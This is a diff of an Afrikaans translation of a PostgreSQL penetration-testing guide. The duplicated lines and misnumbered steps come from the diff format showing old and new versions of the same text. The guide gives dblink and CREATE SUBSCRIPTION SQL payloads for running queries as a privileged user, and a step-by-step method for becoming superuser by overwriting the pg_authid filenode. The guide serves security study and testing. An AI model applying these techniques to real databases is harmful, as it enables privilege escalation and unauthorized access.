As jy die wagwoord van 'n gebruiker met meer voorregte het, maar die gebruiker nie toegelaat word om vanaf 'n eksterne IP in te teken nie, kan jy die volgende funksie gebruik om navrae as daardie gebruiker uit te voer:
```sql
SELECT * FROM dblink('host=127.0.0.1
user=someuser
@ -706,7 +715,7 @@ CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a
user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication
WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);
```
En voer dan **bevele uit**:
En voer dan **bevele** uit:
<figure><img src="../.gitbook/assets/image (9) (1).png" alt=""><figcaption></figcaption></figure>
@ -720,23 +729,25 @@ En voer dan **bevele uit**:
{% endcontent-ref %}
### Privesc deur die Oorskryf van Interne PostgreSQL-tabelle
{% hint style="info" %}
Die volgende privesc-vektor is veral nuttig in beperkte SQLi-kontekste, aangesien alle stappe deur geneste SELECT-stellings uitgevoer kan word.
{% endhint %}
As jy **PostgreSQL-bedienerlêers kan lees en skryf**, kan jy **'n supergebruiker word** deur die PostgreSQL op skyf filenode te oorskryf wat verband hou met die interne `pg_authid`-tabel.
Lees meer oor hierdie tegniek [hier](https://adeadfed.com/posts/updating-postgresql-data-without-update/).
Lees meer oor **hierdie tegniek** [**hier**](https://adeadfed.com/posts/updating-postgresql-data-without-update/)**.**
Die aanvalstappe is:
1. Verkryg die PostgreSQL-data-gids
2. Verkryg 'n relatiewe pad na die filenode wat verband hou met die `pg_authid`-tabel
3. Laai die filenode af deur die `lo_*`-funksies
4. Kry die datatipe wat verband hou met die `pg_authid`-tabel
5. Gebruik die [PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor) om die filenode te [redigeer](https://adeadfed.com/posts/updating-postgresql-data-without-update/#privesc-updating-pg_authid-table); stel alle `rol*` booleaanse vlae op 1 vir volle regte.
7. Laai die geredigeerde filenode weer op via die `lo_*`-funksies en oorskryf die oorspronklike lêer op die skyf
8. *(Opsioneel)* Maak die in-memory tabelkas leeg deur 'n duur SQL-navraag uit te voer
9. Jy behoort nou die regte van 'n volle superadmin te hê.
5. Gebruik die [PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor) om die filenode te wysig; stel alle `rol*` booleaanse vlae op 1 vir volle regte.
6. Laai die gewysigde filenode weer op via die `lo_*`-funksies en oorskryf die oorspronklike lêer op die skyf
7. _(Opsioneel)_ Maak die in-memory tabel-cache skoon deur 'n duur SQL-navraag uit te voer
8. Jy behoort nou die regte van 'n volle superadmin te hê.
## **POST**
```
@ -772,6 +783,6 @@ string pgadmin4.db
```
### pg\_hba
Kliëntverifikasie in PostgreSQL word bestuur deur 'n konfigurasie lêer genaamd **pg_hba.conf**. Hierdie lêer bevat 'n reeks rekords, elkeen spesifiseer 'n verbindings tipe, klient IP-adres reeks (indien van toepassing), databasis naam, gebruikersnaam, en die verifikasiemetode om te gebruik vir ooreenstemmende verbindings. Die eerste rekord wat ooreenstem met die verbindings tipe, klient adres, versoekte databasis, en gebruikersnaam word gebruik vir verifikasie. Daar is geen terugval of rugsteun as verifikasie misluk nie. As geen rekord ooreenstem nie, word toegang geweier.
Kliëntverifikasie in PostgreSQL word bestuur deur 'n konfigurasie lêer genaamd **pg\_hba.conf**. Hierdie lêer bevat 'n reeks rekords, elkeen spesifiseer 'n verbindings tipe, klient IP-adres reeks (indien van toepassing), databasis naam, gebruikersnaam, en die verifikasiemetode om te gebruik vir ooreenstemmende verbindings. Die eerste rekord wat ooreenstem met die verbindings tipe, klient adres, aangevraagde databasis, en gebruikersnaam word gebruik vir verifikasie. Daar is geen terugval of rugsteun as verifikasie misluk nie. As geen rekord ooreenstem nie, word toegang geweier.
Die beskikbare wagwoord-gebaseerde verifikasiemetodes in pg_hba.conf is **md5**, **crypt**, en **password**. Hierdie metodes verskil in hoe die wagwoord oorgedra word: MD5-gehasht, crypt-versleutel, of teks in duidelike taal. Dit is belangrik om op te let dat die crypt-metode nie gebruik kan word met wagwoorde wat in pg_authid versleutel is.
Die beskikbare wagwoord-gebaseerde verifikasiemetodes in pg\_hba.conf is **md5**, **crypt**, en **password**. Hierdie metodes verskil in hoe die wagwoord oorgedra word: MD5-gehasht, crypt-geënkripteer, of duidelike teks. Dit is belangrik om te let dat die crypt-metode nie gebruik kan word met wagwoorde wat in pg\_authid geënkripteer is.

935
windows-hardening/windows-local-privilege-escalation/README.md
View file

File diff suppressed because it is too large Load diff